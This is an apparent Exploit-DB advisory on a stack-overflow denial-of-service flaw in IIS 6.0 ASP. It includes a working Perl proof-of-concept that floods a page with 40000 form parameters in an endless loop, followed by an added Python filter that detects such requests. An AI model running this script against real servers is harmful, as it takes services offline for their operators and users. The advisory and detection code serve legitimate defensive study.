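Microsoft IIS 6.0 ASP Stack Overflow Denial-of-Service Vulnerability
An attacker sends a POST request to an ASP page, with more than 40000 request parameters in the request, encoded as x-www-form-urlencoded. By exploiting this vulnerability an attacker can crash the IIS worker process, which causes the default application pool to be disabled and results in a denial of service.
PoC Exploit: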
# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl <host> <asp page>
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
    $sock = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 'http(80)',
                                  Proto    => 'tcp');
    # request body: the same form parameter repeated 40000 times
    $write = "C=A&" x 40000;
    print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
        ."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        ."Content-Length:". length($write) ."\r\n\r\n" . $write;
    print ".";
    # echo whatever the server sends back
    while(<$sock>) {
        print;
    }
}

EDB Notes:
In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard
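
A defensive pre-filter for the request shape described above, as an added example that is not part of the original post or of the EDB entry: it counts x-www-form-urlencoded parameters in a raw request and also flags a body sent with HEAD, which is what the PoC actually transmits. The limit MAX_PARAMS, the page /form.asp and the host iis.example are assumptions made for illustration.

```python
# Added example: pre-filter for form-parameter floods (constructed inputs, assumed limit).
MAX_PARAMS = 1000  # assumed policy limit, not a value from the page or from IIS


def count_form_params(body: bytes) -> int:
    """Count non-empty '&'-separated pairs without building a dict."""
    return sum(1 for pair in body.split(b"&") if pair)


def inspect_request(raw: bytes, max_params: int = MAX_PARAMS) -> list:
    """Return a list of findings for one raw HTTP/1.1 request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace").upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:  # tolerate "Name:value" with no space, as the PoC sends
            headers[name.strip().lower()] = value.strip()

    findings = []
    declared = headers.get(b"content-length", b"0")
    length = int(declared) if declared.isdigit() else -1
    if length < 0:
        findings.append("bad-content-length")
    # HEAD and GET normally carry no body; the PoC sends one with HEAD
    if method in ("HEAD", "GET") and (length > 0 or body):
        findings.append("body-on-bodyless-method")
    ctype = headers.get(b"content-type", b"").split(b";")[0].strip().lower()
    if ctype == b"application/x-www-form-urlencoded":
        n = count_form_params(body)
        if n > max_params:
            findings.append(f"param-flood:{n}")
    return findings


def build_request(method: str, body: bytes) -> bytes:
    """Constructed sample request for a hypothetical /form.asp page."""
    return (f"{method} /form.asp HTTP/1.1\r\nHost: iis.example\r\n"
            "Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length:{len(body)}\r\n\r\n").encode() + body


if __name__ == "__main__":
    print(inspect_request(build_request("HEAD", b"C=A&" * 40000)))
    print(inspect_request(build_request("POST", b"user=a&pass=b")))
```

A check like this belongs in front of the ASP handler (reverse proxy or request filter), so an oversized parameter list is rejected before the worker process parses it.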